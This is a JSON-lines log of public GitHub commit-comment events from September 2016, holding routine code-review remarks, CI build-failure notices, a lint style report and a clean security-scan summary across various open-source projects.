{"id":"4588081369","type":"CommitCommentEvent","actor":{"login":"snicolet"},"repo":{"name":"pb00068/Stockfish"},"payload":{"comment":{"id":19092359,"position":null,"line":null,"path":null,"commit_id":"1ad4f113a284e77a290e0dfdddf0eb6cc41ac37b","created_at":"2016-09-20T08:04:12Z","updated_at":"2016-09-20T08:04:12Z","body":"Interesting! This is a generalization of http://tests.stockfishchess.org/tests/view/57d9c0650ebc59030fbe5324\r\n\r\nYou can also consider using something similar to the condition !aligned(from, to, square<KING>(color))) to handle discovered checks by pawns."}},"created_at":"2016-09-20T08:04:12Z"}
{"id":"4588083444","type":"CommitCommentEvent","actor":{"login":"LouisGac"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":19092365,"position":null,"line":null,"path":null,"commit_id":"dfadb95c919ee21d0b9e3bb0e3a207c1f0b0a3b7","created_at":"2016-09-20T08:04:40Z","updated_at":"2016-09-20T08:04:40Z","body":"Not sure: just saying. "}},"created_at":"2016-09-20T08:04:40Z"}
{"id":"4588090206","type":"CommitCommentEvent","actor":{"login":"friedmandavid"},"repo":{"name":"Angizd/A.zobarandiez"},"payload":{"comment":{"id":19092373,"position":null,"line":null,"path":null,"commit_id":"68462219f3ab7f7cfe7541d3d1e13464c26d0388","created_at":"2016-09-20T08:06:13Z","updated_at":"2016-09-20T08:06:13Z","body":":)"}},"created_at":"2016-09-20T08:06:13Z"}
{"id":"4588091268","type":"CommitCommentEvent","actor":{"login":"seriousManual"},"repo":{"name":"cookiefactory/fuzzystringmatch"},"payload":{"comment":{"id":19092374,"position":null,"line":null,"path":null,"commit_id":"842abe7dcb43b52c253d4c914fde25a501a843b8","created_at":"2016-09-20T08:06:29Z","updated_at":"2016-09-20T08:06:29Z","body":"up to now only one instance of subject can be supplied to the digester"}},"created_at":"2016-09-20T08:06:29Z"}
{"id":"4588092115","type":"CommitCommentEvent","actor":{"login":"sorbits"},"repo":{"name":"textmate/textmate"},"payload":{"comment":{"id":19092376,"position":null,"line":null,"path":null,"commit_id":"dc0331b781246cf76d0f2dc3b71638d2677fac5d","created_at":"2016-09-20T08:06:41Z","updated_at":"2016-09-20T08:06:41Z","body":"ad883f7...10f8821 implements the same workaround as Finder for this.\r\n"}},"created_at":"2016-09-20T08:06:41Z"}
{"id":"4588093235","type":"CommitCommentEvent","actor":{"login":"olleharstedt"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":19092381,"position":null,"line":null,"path":null,"commit_id":"dfadb95c919ee21d0b9e3bb0e3a207c1f0b0a3b7","created_at":"2016-09-20T08:06:59Z","updated_at":"2016-09-20T08:06:59Z","body":"Yep, just moving code, no other change."}},"created_at":"2016-09-20T08:06:59Z"}
{"id":"4588094374","type":"CommitCommentEvent","actor":{"login":"ryba-xek"},"repo":{"name":"ryba-xek/uuid"},"payload":{"comment":{"id":19092384,"position":null,"line":null,"path":null,"commit_id":"4482a7cd2749f594272393e87bffd1b516fb8c46","created_at":"2016-09-20T08:07:13Z","updated_at":"2016-09-20T08:07:13Z","body":"Oh, thanks, man, my fault. I'll think up what to do with this after I'm back from vacation.\r\nThanks again for noticing. The library is great!"}},"created_at":"2016-09-20T08:07:13Z"}
{"id":"4588095796","type":"CommitCommentEvent","actor":{"login":"giovannisfois"},"repo":{"name":"giovannisfois/gallerizr-symfony-3"},"payload":{"comment":{"id":19092385,"position":null,"line":null,"path":null,"commit_id":"c1d29c4f70b10353be212c89d4073bb678213f48","created_at":"2016-09-20T08:07:34Z","updated_at":"2016-09-20T08:07:34Z","body":"This file contents have been translated to English.\r\nThey are going to be moved to the project kanban board.\r\n"}},"created_at":"2016-09-20T08:07:34Z"}
{"id":"4588100188","type":"CommitCommentEvent","actor":{"login":"jb3-2"},"repo":{"name":"StataBS/indikatoren"},"payload":{"comment":{"id":19092391,"position":null,"line":null,"path":null,"commit_id":"2dc50480528c35283f2dbffbbd76818faef32f89","created_at":"2016-09-20T08:08:41Z","updated_at":"2016-09-20T08:08:41Z","body":"Zusätzlich: Bist Du sicher, dass es sich bei den neuen Zahlen in den Spalten-Headers um die Jahreszahl der Daten, nicht um die Jahreszahl der Publikation handelt? "}},"created_at":"2016-09-20T08:08:41Z"}
{"id":"4588101649","type":"CommitCommentEvent","actor":{"login":"floriandeboissieu"},"repo":{"name":"floriandeboissieu/lidR"},"payload":{"comment":{"id":19092397,"position":null,"line":null,"path":null,"commit_id":"f0bff37896196234322d0cc5fa9b8a0b2ce4a433","created_at":"2016-09-20T08:09:02Z","updated_at":"2016-09-20T08:09:02Z","body":"To keep not only 4 tiles but any intersecting tile"}},"created_at":"2016-09-20T08:09:02Z"}
{"id":"4588102440","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19092399,"position":null,"line":null,"path":null,"commit_id":"ce19bb6d8655cb70e4fdda0f48ccd73c364834c3","created_at":"2016-09-20T08:09:13Z","updated_at":"2016-09-20T08:09:13Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1055](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13584&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **FAILURE**\nSummary: Tests failed: 3 (3 new), passed: 215, ignored: 3 Build time: 00:11:10\n### Failed tests\n```\norg.genivi.sota.device_registry.DeviceResourceSpec.GET request with ?regex yields devices which match the regex.: <no details avaliable>\n\norg.genivi.sota.core.PackagesResourceSpec.returns package blacklist info when searching blacklisted package: <no details avaliable>\n\norg.genivi.sota.core.transfer.DeviceUpdatesSpec.when multiple packages are pending sorted by installPos: <no details avaliable>\n\n```\n"}},"created_at":"2016-09-20T08:09:13Z"}
{"id":"4588111058","type":"CommitCommentEvent","actor":{"login":"willmclaren"},"repo":{"name":"Ensembl/VEP_plugins"},"payload":{"comment":{"id":19092419,"position":4,"line":97,"path":"Downstream.pm","commit_id":"bf425dba599ff5d5359b0481a5b1df8afc943da7","created_at":"2016-09-20T08:11:13Z","updated_at":"2016-09-20T08:11:13Z","body":"Yeah that should work"}},"created_at":"2016-09-20T08:11:13Z"}
{"id":"4588112164","type":"CommitCommentEvent","actor":{"login":"ArseniyShestakov"},"repo":{"name":"vcmi/vcmi"},"payload":{"comment":{"id":19092425,"position":17,"line":4397,"path":"server/CGameHandler.cpp","commit_id":"58f90b736bcd3cb0c966f217b700a92ae4e42ed7","created_at":"2016-09-20T08:11:29Z","updated_at":"2016-09-20T08:11:29Z","body":"It's slow anyway since it's sent a ton of tiles via netpacks. I have long-standing wish to do some cheats refactoring (and add more useful features to them) so I'll improve it then.\r\n\r\nAlso work on FoW anyway and wish to implement some feature to get rid of this loop."}},"created_at":"2016-09-20T08:11:29Z"}
{"id":"4588112653","type":"CommitCommentEvent","actor":{"login":"andyblac"},"repo":{"name":"OpenViX/enigma2"},"payload":{"comment":{"id":19092426,"position":null,"line":null,"path":null,"commit_id":"988379ee1df1e88c6e74236cd79749abbb7489f9","created_at":"2016-09-20T08:11:35Z","updated_at":"2016-09-20T08:11:35Z","body":"Rob, you forgot one BIG fact, the reason i sue relative positions is AutoRes, with locked positions you can not use it, i.e. in vix the infonaut is always 10 pixels from the bottom of screen, if you edit skins to be locked locations, you WILL break AutoRes for skins."}},"created_at":"2016-09-20T08:11:35Z"}
{"id":"4588117220","type":"CommitCommentEvent","actor":{"login":"Noin04"},"repo":{"name":"woothemes/woocommerce"},"payload":{"comment":{"id":19092433,"position":null,"line":null,"path":null,"commit_id":"3c13ce6fcda8e9af6b3c38de8fc71cabbe5a23a2","created_at":"2016-09-20T08:12:35Z","updated_at":"2016-09-20T08:12:35Z","body":"Hello,\r\n\r\nA warning in my woocommerce is appearing saying the next message: \"Warning: trim() expects parameter 1 to be string, object given in /var/www/html/wp-content/plugins/woocommerce/includes/class-wc-cart.php\".\r\nWith the modification made above, the problem is solved, but I don't want to modify the core files of the woocommerce because on the following updates, my change will be overriden.\r\nWould be this change in the woocommerce in the future versions? As in the topic says [2.6] I thought in that version the change would be applied, but I have the 2.6.4 and the change is not there.\r\n\r\nExcuse me for my ignorance, if I'm posting this where I don't have to.\r\n\r\nThanks in advance.\r\n\r\nCheers"}},"created_at":"2016-09-20T08:12:35Z"}
{"id":"4588118985","type":"CommitCommentEvent","actor":{"login":"MeGaPk"},"repo":{"name":"jinzhu/gorm"},"payload":{"comment":{"id":19092437,"position":13,"line":306,"path":"scope.go","commit_id":"eb8f806023f5a0f49cd48d8efda5563077a97d31","created_at":"2016-09-20T08:12:58Z","updated_at":"2016-09-20T08:12:58Z","body":"Please add this information to documentation about that flag. (http://jinzhu.me/gorm/curd.html#update)"}},"created_at":"2016-09-20T08:12:58Z"}
{"id":"4588119147","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19092438,"position":null,"line":null,"path":null,"commit_id":"ce19bb6d8655cb70e4fdda0f48ccd73c364834c3","created_at":"2016-09-20T08:13:01Z","updated_at":"2016-09-20T08:13:01Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1056](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13587&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-20T08:13:01Z"}
{"id":"4588127155","type":"CommitCommentEvent","actor":{"login":"tmortagne"},"repo":{"name":"xwiki/xwiki-platform"},"payload":{"comment":{"id":19092453,"position":9,"line":123,"path":"xwiki-platform-core/xwiki-platform-security/xwiki-platform-security-api/src/main/java/org/xwiki/security/authorization/cache/internal/SecurityCache.java","commit_id":"53dbabc7c723cf6e9bc41d98947d6f3a7951edc0","created_at":"2016-09-20T08:14:51Z","updated_at":"2016-09-20T08:14:51Z","body":"Yes that's how we do most of the time."}},"created_at":"2016-09-20T08:14:51Z"}
{"id":"4588130547","type":"CommitCommentEvent","actor":{"login":"njmordetzky"},"repo":{"name":"njmordetzky/njmordetzky"},"payload":{"comment":{"id":19092461,"position":23,"line":null,"path":"css/1_header.scss","commit_id":"372128b6c08b69dc6324bd4cedb9584e28191190","created_at":"2016-09-20T08:15:36Z","updated_at":"2016-09-20T08:15:36Z","body":"done"}},"created_at":"2016-09-20T08:15:36Z"}
{"id":"4588130816","type":"CommitCommentEvent","actor":{"login":"XhmikosR"},"repo":{"name":"kasper93/mpc-hc"},"payload":{"comment":{"id":19092462,"position":null,"line":null,"path":null,"commit_id":"209985cde61ed382e5ed0a929ecf6eb07decd1fe","created_at":"2016-09-20T08:15:40Z","updated_at":"2016-09-20T08:15:40Z","body":"Are you sure about this change? I mean, technically it's `hh:mm:ss`, right?"}},"created_at":"2016-09-20T08:15:40Z"}
{"id":"4588133227","type":"CommitCommentEvent","actor":{"login":"snicolet"},"repo":{"name":"ElbertoOne/Stockfish"},"payload":{"comment":{"id":19092467,"position":null,"line":null,"path":null,"commit_id":"abf3e9ca31dc225586e171431d5a0d804fb660dc","created_at":"2016-09-20T08:16:11Z","updated_at":"2016-09-20T08:16:11Z","body":"The fact that I am not done with my attempts at the flanks idea (though I'm getting more and more desperate, it has to be admitted) is not an argument :-) People can do whatever they want with my tests!"}},"created_at":"2016-09-20T08:16:11Z"}
{"id":"4588134059","type":"CommitCommentEvent","actor":{"login":"tomlutzenberger"},"repo":{"name":"twbs/bootstrap"},"payload":{"comment":{"id":19092469,"position":null,"line":null,"path":null,"commit_id":"63129112bbea91f7cd62014f162f857f50084656","created_at":"2016-09-20T08:16:19Z","updated_at":"2016-09-20T08:16:19Z","body":"@mdo It was not meant as an insult. I'm sorry."}},"created_at":"2016-09-20T08:16:19Z"}
{"id":"4588140562","type":"CommitCommentEvent","actor":{"login":"dimaqq"},"repo":{"name":"dw/py-lmdb"},"payload":{"comment":{"id":19092487,"position":5,"line":8,"path":"README.md","commit_id":"25799170db9d428b719d26a496724f95d5b547a8","created_at":"2016-09-20T08:17:47Z","updated_at":"2016-09-20T08:17:47Z","body":"You probably meant `cavalier attitude` (arrogant) rather than `Cavelier` (French explorer)."}},"created_at":"2016-09-20T08:17:47Z"}
{"id":"4588145307","type":"CommitCommentEvent","actor":{"login":"hardikupadhyay16"},"repo":{"name":"charusat09/kms"},"payload":{"comment":{"id":19092501,"position":null,"line":null,"path":null,"commit_id":"1a9ef429143aa740a1c198608be1c9ea1932396b","created_at":"2016-09-20T08:18:55Z","updated_at":"2016-09-20T08:18:55Z","body":"Picture model must contain \"imageable_id\" and \"imageable_type\" field."}},"created_at":"2016-09-20T08:18:55Z"}
{"id":"4588149809","type":"CommitCommentEvent","actor":{"login":"enjoy-digital"},"repo":{"name":"enjoy-digital/litejesd204b"},"payload":{"comment":{"id":19092509,"position":null,"line":null,"path":null,"commit_id":"2011a5f243d1b187420d17f5cceb8893790c5b16","created_at":"2016-09-20T08:19:56Z","updated_at":"2016-09-20T08:19:56Z","body":"Yes we can use transceiver clock (probably not a multiple of if since we are already at 312.5MHz for a 12.5Gbps link) to run transport layer if the data generator is able to give continous data stream at this frequency. I will add a parameter to remove the fifo in that case and only keep the elastic buffers.\r\n"}},"created_at":"2016-09-20T08:19:56Z"}
{"id":"4588152202","type":"CommitCommentEvent","actor":{"login":"richelbilderbeek"},"repo":{"name":"richelbilderbeek/nLTT"},"payload":{"comment":{"id":19092512,"position":null,"line":null,"path":null,"commit_id":"fbad5877b4eb7aebcd4f009a417f3fa70632d9b6","created_at":"2016-09-20T08:20:24Z","updated_at":"2016-09-20T08:20:24Z","body":"@thijsjanzen : looks like you've skipped the top line: `Generated by roxygen2: do not edit by hand`. This line will be removed the next build. I'll fix it."}},"created_at":"2016-09-20T08:20:24Z"}
{"id":"4588153994","type":"CommitCommentEvent","actor":{"login":"benjycui"},"repo":{"name":"ant-design/ant-design-mobile"},"payload":{"comment":{"id":19092518,"position":4,"line":43,"path":".eslintrc.js","commit_id":"37970f0116f73a31e77bb0f8e3a9280705a4e460","created_at":"2016-09-20T08:20:46Z","updated_at":"2016-09-20T08:20:46Z","body":"即使是最新版的 `eslint-config-airbnb` 也还是用了这个规则，所以只能 disable"}},"created_at":"2016-09-20T08:20:46Z"}
{"id":"4588155417","type":"CommitCommentEvent","actor":{"login":"lukashlobil"},"repo":{"name":"NativeScript/docs"},"payload":{"comment":{"id":19092522,"position":46,"line":197,"path":"ui/action-bar.md","commit_id":"a45d25fc78d324b8501deb52fa13617ec8663c8f","created_at":"2016-09-20T08:21:05Z","updated_at":"2016-09-20T08:21:05Z","body":"Hi, the link is broken and I cannot find any suitable replacement for the link, can you please look into it?"}},"created_at":"2016-09-20T08:21:05Z"}
{"id":"4588159907","type":"CommitCommentEvent","actor":{"login":"dgervalle"},"repo":{"name":"xwiki/xwiki-platform"},"payload":{"comment":{"id":19092535,"position":9,"line":123,"path":"xwiki-platform-core/xwiki-platform-security/xwiki-platform-security-api/src/main/java/org/xwiki/security/authorization/cache/internal/SecurityCache.java","commit_id":"53dbabc7c723cf6e9bc41d98947d6f3a7951edc0","created_at":"2016-09-20T08:22:01Z","updated_at":"2016-09-20T08:22:01Z","body":"Just to mention it, I have just used the notation I have found in the same piece of code, which I think was not mine, so would be nice at least to have a clear rule."}},"created_at":"2016-09-20T08:22:01Z"}
{"id":"4588170280","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19092552,"position":null,"line":null,"path":null,"commit_id":"ce19bb6d8655cb70e4fdda0f48ccd73c364834c3","created_at":"2016-09-20T08:24:13Z","updated_at":"2016-09-20T08:24:13Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1056](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13587&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **FAILURE**\nSummary: Tests failed: 2 (2 new), passed: 212, ignored: 3 Build time: 00:11:12\n### Failed tests\n```\norg.genivi.sota.core.PackageResourceWordSpec: <no details avaliable>\n\norg.genivi.sota.core.transfer.DeviceUpdatesSpec.marks reported packages as installed: <no details avaliable>\n\n```\n"}},"created_at":"2016-09-20T08:24:13Z"}
{"id":"4588171030","type":"CommitCommentEvent","actor":{"login":"richelbilderbeek"},"repo":{"name":"richelbilderbeek/nLTT"},"payload":{"comment":{"id":19092554,"position":5,"line":302,"path":"R/ABC_SMC.R","commit_id":"97165e658395ffc3c8893e1bc622abf85e4b63bf","created_at":"2016-09-20T08:24:22Z","updated_at":"2016-09-20T08:24:22Z","body":"This adds `mcmc_nltt` to the `NAMESPACE` file"}},"created_at":"2016-09-20T08:24:22Z"}
{"id":"4588175565","type":"CommitCommentEvent","actor":{"login":"dortal"},"repo":{"name":"dortal/bookstorephp4_9810_lines"},"payload":{"comment":{"id":19092562,"position":null,"line":null,"path":null,"commit_id":"0d90a48ef1c8bd6d84ce271e1dd777964763d87d","created_at":"2016-09-20T08:25:18Z","updated_at":"2016-09-20T08:25:18Z","body":"Checkmarx scan results 20 Sep 2016 11:25 UTC +03:00\r\n<table>\r\n<thead>\r\n<tr>\r\n<th></th>\r\n<th>High</th>\r\n<th>Medium</th>\r\n<th>Low</th>\r\n<th>Info</th>\r\n</tr>\r\n</thead>\r\n<tbody>\r\n<tr>\r\n<td><b>New</b></td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n</tr>\r\n<tr>\r\n<td><b>Recurrent</b></td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n</tr>\r\n<tr>\r\n<td><b>Fixed</b></td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<a href= \"http://localhost:6311/CxWebClient/ViewerMain.aspx?scanid=1000053&projectid=28\"> Open Viewer</a>\r\n<b>Included commits</b><table><tr><th>Commit ID</th><th>Owner</th></tr><tr><td><a href=\"https://github.com/dortal/bookstorephp4_9810_lines/commit/0d90a48ef1c8bd6d84ce271e1dd777964763d87d\">0d90a48ef1c8bd6d84ce271e1dd777964763d87d</a></td><td>@web-flow</td></tr></table>\r\n"}},"created_at":"2016-09-20T08:25:18Z"}
{"id":"4588184039","type":"CommitCommentEvent","actor":{"login":"dereuromark"},"repo":{"name":"FriendsOfCake/search"},"payload":{"comment":{"id":19092575,"position":6,"line":38,"path":"src/Controller/Component/PrgComponent.php","commit_id":"82818bd853f2f06cb64298af5f52546c88686360","created_at":"2016-09-20T08:27:08Z","updated_at":"2016-09-20T08:27:08Z","body":"Please revert this. This change was invalid and is against return early paradigm"}},"created_at":"2016-09-20T08:27:08Z"}
{"id":"4588184952","type":"CommitCommentEvent","actor":{"login":"dereuromark"},"repo":{"name":"FriendsOfCake/search"},"payload":{"comment":{"id":19092577,"position":10,"line":85,"path":"src/Manager.php","commit_id":"82818bd853f2f06cb64298af5f52546c88686360","created_at":"2016-09-20T08:27:19Z","updated_at":"2016-09-20T08:27:19Z","body":"Same here, also invalid"}},"created_at":"2016-09-20T08:27:19Z"}
{"id":"4588188669","type":"CommitCommentEvent","actor":{"login":"rhelmot"},"repo":{"name":"Vector35/binaryninja-api"},"payload":{"comment":{"id":19092591,"position":12,"line":12,"path":"python/examples/angr_plugin.py","commit_id":"9ab0ead47220d704a3c80cae25ddd05afac55271","created_at":"2016-09-20T08:28:05Z","updated_at":"2016-09-20T08:28:05Z","body":"Hey, could you open an issue over at the angr github about this? This is not intended behavior :)"}},"created_at":"2016-09-20T08:28:05Z"}
{"id":"4588191613","type":"CommitCommentEvent","actor":{"login":"dereuromark"},"repo":{"name":"FriendsOfCake/search"},"payload":{"comment":{"id":19092602,"position":null,"line":null,"path":null,"commit_id":"82818bd853f2f06cb64298af5f52546c88686360","created_at":"2016-09-20T08:28:40Z","updated_at":"2016-09-20T08:28:40Z","body":"This change was a really bad commit. Please make a PR first to discuss this.\r\nThe \"return early\" must have precedence over negative statements, always, in core as it should in any other \"clean code\"."}},"created_at":"2016-09-20T08:28:40Z"}
{"id":"4588192125","type":"CommitCommentEvent","actor":{"login":"drj11"},"repo":{"name":"drj11/shell"},"payload":{"comment":{"id":19092604,"position":null,"line":null,"path":null,"commit_id":"9c64a9792e9141c0bd600831d1b7d87c5cb6dbe6","created_at":"2016-09-20T08:28:47Z","updated_at":"2016-09-20T08:28:47Z","body":"@jets42 `:` is a special builtin, the ordinary rules don't apply."}},"created_at":"2016-09-20T08:28:47Z"}
{"id":"4588195537","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19092617,"position":null,"line":null,"path":null,"commit_id":"10679136205c580ed445a2108532b538b6edfe5f","created_at":"2016-09-20T08:29:29Z","updated_at":"2016-09-20T08:29:29Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1057](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13590&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-20T08:29:29Z"}
{"id":"4588206170","type":"CommitCommentEvent","actor":{"login":"HuZai"},"repo":{"name":"luchun27/secooUI"},"payload":{"comment":{"id":19092631,"position":null,"line":null,"path":null,"commit_id":"d58051cbaf4e8138b4ed053f872f61b798fe4cff","created_at":"2016-09-20T08:31:35Z","updated_at":"2016-09-20T08:31:35Z","body":"ok"}},"created_at":"2016-09-20T08:31:35Z"}
{"id":"4588206466","type":"CommitCommentEvent","actor":{"login":"slluis"},"repo":{"name":"mono/monodevelop"},"payload":{"comment":{"id":19092632,"position":null,"line":null,"path":null,"commit_id":"5e7c6616171106867f7fdf52ef1526e0c3dcb6e6","created_at":"2016-09-20T08:31:38Z","updated_at":"2016-09-20T08:31:38Z","body":"This regressed this bug: https://bugzilla.xamarin.com/show_bug.cgi?id=35343"}},"created_at":"2016-09-20T08:31:38Z"}
{"id":"4588207355","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"richelbilderbeek/Cer2016"},"payload":{"comment":{"id":19092636,"position":null,"line":null,"path":null,"commit_id":"e37c145291e0572f8eb555d33f02b251b6a7d018","created_at":"2016-09-20T08:31:49Z","updated_at":"2016-09-20T08:31:49Z","body":"[R/alignments_same_distr.R:13:1:](https://github.com/richelbilderbeek/Cer2016/blob/e37c145291e0572f8eb555d33f02b251b6a7d018/R/alignments_same_distr.R#L13) *style:* **Variable and function names should not be longer than 30 characters.**\n```r\n​alignments_same_distr_nltt_stat <- function(df) {\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/posteriors_same_distr.R:13:1:](https://github.com/richelbilderbeek/Cer2016/blob/e37c145291e0572f8eb555d33f02b251b6a7d018/R/posteriors_same_distr.R#L13) *style:* **Variable and function names should not be longer than 30 characters.**\n```r\n​posteriors_same_distr_nltt_stat <- function(df) {\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-alignments_same_distr.R:8:9:](https://github.com/richelbilderbeek/Cer2016/blob/e37c145291e0572f8eb555d33f02b251b6a7d018/tests/testthat/test-alignments_same_distr.R#L8) *style:* **Variable and function names should not be longer than 30 characters.**\n```r\n​  df <- alignments_same_distr_nltt_stat(nltt_stats)\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-alignments_same_distr.R:31:5:](https://github.com/richelbilderbeek/Cer2016/blob/e37c145291e0572f8eb555d33f02b251b6a7d018/tests/testthat/test-alignments_same_distr.R#L31) *style:* **Variable and function names should not be longer than 30 characters.**\n```r\n​    alignments_same_distr_nltt_stat(nltt_stats),\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-alignments_same_distr.R:44:19:](https://github.com/richelbilderbeek/Cer2016/blob/e37c145291e0572f8eb555d33f02b251b6a7d018/tests/testthat/test-alignments_same_distr.R#L44) *style:* **Commas should always have a space after.**\n```r\n​    sti = rep(c(1,2), each = 100, times = 1),\n                  ^\n```\n[tests/testthat/test-alignments_same_distr.R:50:9:](https://github.com/richelbilderbeek/Cer2016/blob/e37c145291e0572f8eb555d33f02b251b6a7d018/tests/testthat/test-alignments_same_distr.R#L50) *style:* **Variable and function names should not be longer than 30 characters.**\n```r\n​  df <- alignments_same_distr_nltt_stat(nltt_stats)\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-alignments_same_distr.R:70:9:](https://github.com/richelbilderbeek/Cer2016/blob/e37c145291e0572f8eb555d33f02b251b6a7d018/tests/testthat/test-alignments_same_distr.R#L70) *style:* **Variable and function names should not be longer than 30 characters.**\n```r\n​  df <- alignments_same_distr_nltt_stat(nltt_stats)\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-posteriors_same_distr.R:8:9:](https://github.com/richelbilderbeek/Cer2016/blob/e37c145291e0572f8eb555d33f02b251b6a7d018/tests/testthat/test-posteriors_same_distr.R#L8) *style:* **Variable and function names should not be longer than 30 characters.**\n```r\n​  df <- posteriors_same_distr_nltt_stat(nltt_stats)\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-posteriors_same_distr.R:29:9:](https://github.com/richelbilderbeek/Cer2016/blob/e37c145291e0572f8eb555d33f02b251b6a7d018/tests/testthat/test-posteriors_same_distr.R#L29) *style:* **Variable and function names should not be longer than 30 characters.**\n```r\n​  df <- posteriors_same_distr_nltt_stat(nltt_stats)\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-posteriors_same_distr.R:47:9:](https://github.com/richelbilderbeek/Cer2016/blob/e37c145291e0572f8eb555d33f02b251b6a7d018/tests/testthat/test-posteriors_same_distr.R#L47) *style:* **Variable and function names should not be longer than 30 characters.**\n```r\n​  df <- posteriors_same_distr_nltt_stat(nltt_stats)\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```"}},"created_at":"2016-09-20T08:31:49Z"}
{"id":"4588209546","type":"CommitCommentEvent","actor":{"login":"oli-obk"},"repo":{"name":"solson/miri"},"payload":{"comment":{"id":19092638,"position":21,"line":128,"path":"src/interpreter/terminator.rs","commit_id":"c1ae916a64395755a937fa4374f74093b1549221","created_at":"2016-09-20T08:32:16Z","updated_at":"2016-09-20T08:32:16Z","body":"why aren't you forwarding the `Err` case? The `len` is from user input and could just as well be an lvalue. If that is not the case ever, we should patch the `mir::AssertMessage` type."}},"created_at":"2016-09-20T08:32:16Z"}
{"id":"4588212817","type":"CommitCommentEvent","actor":{"login":"tonmoy71"},"repo":{"name":"NerdCats/SwatKat"},"payload":{"comment":{"id":19092642,"position":5,"line":8,"path":"build.gradle","commit_id":"2d131074bb82077201d58b57fe48da9ff5836acf","created_at":"2016-09-20T08:32:56Z","updated_at":"2016-09-20T08:32:56Z","body":"Updated Android Studio? 👍 "}},"created_at":"2016-09-20T08:32:56Z"}
{"id":"4588213512","type":"CommitCommentEvent","actor":{"login":"pinhi"},"repo":{"name":"pinhi/sunor"},"payload":{"comment":{"id":19092645,"position":null,"line":null,"path":null,"commit_id":"471c40b2803f7a6e8ef3f0720d31ae186ae9f137","created_at":"2016-09-20T08:33:06Z","updated_at":"2016-09-20T08:33:06Z","body":"In this proyect i use all android's technology than i can for trainning. If u want to give me a advice, please send it to me, ill feel so happy. Good day."}},"created_at":"2016-09-20T08:33:06Z"}
{"id":"4588215649","type":"CommitCommentEvent","actor":{"login":"CxTest"},"repo":{"name":"CxTest/CxRepository"},"payload":{"comment":{"id":19092650,"position":null,"line":null,"path":null,"commit_id":"dc83cc8a4b4da3bba96765258bfa33a19adb1117","created_at":"2016-09-20T08:33:33Z","updated_at":"2016-09-20T08:33:33Z","body":"INTEGRATION TESTING_2016-09-20 11:33:28"}},"created_at":"2016-09-20T08:33:33Z"}
{"id":"4588219605","type":"CommitCommentEvent","actor":{"login":"fahadwajed"},"repo":{"name":"NerdCats/SwatKat"},"payload":{"comment":{"id":19092654,"position":5,"line":8,"path":"build.gradle","commit_id":"2d131074bb82077201d58b57fe48da9ff5836acf","created_at":"2016-09-20T08:34:21Z","updated_at":"2016-09-20T08:34:21Z","body":"Yeap. They released 2.2"}},"created_at":"2016-09-20T08:34:21Z"}
{"id":"4588223725","type":"CommitCommentEvent","actor":{"login":"HuZai"},"repo":{"name":"luchun27/secooUI"},"payload":{"comment":{"id":19092665,"position":1,"line":1,"path":"src/tem/test.html","commit_id":"d58051cbaf4e8138b4ed053f872f61b798fe4cff","created_at":"2016-09-20T08:35:13Z","updated_at":"2016-09-20T08:35:13Z","body":"what?"}},"created_at":"2016-09-20T08:35:13Z"}
{"id":"4588224830","type":"CommitCommentEvent","actor":{"login":"m-g-sonar"},"repo":{"name":"SonarSource/sonar-examples"},"payload":{"comment":{"id":19092668,"position":49,"line":55,"path":"plugins/java-custom-rules/src/main/java/org/sonar/samples/java/checks/AvoidMethodDeclarationRule.java","commit_id":"21f3650044656e12494e2b19fab0c28a6ba9b8af","created_at":"2016-09-20T08:35:27Z","updated_at":"2016-09-20T08:35:27Z","body":"This rule does not target method invocation, it target method declarations. Therefore, the message should be changed to `Avoid declaring methods`.\r\n\r\nIt would be also more interesting to only highlight the name of the method (using `tree.simpleName()`), and not the whole method. Result will be nicer when looking at the result after running an analysis."}},"created_at":"2016-09-20T08:35:27Z"}
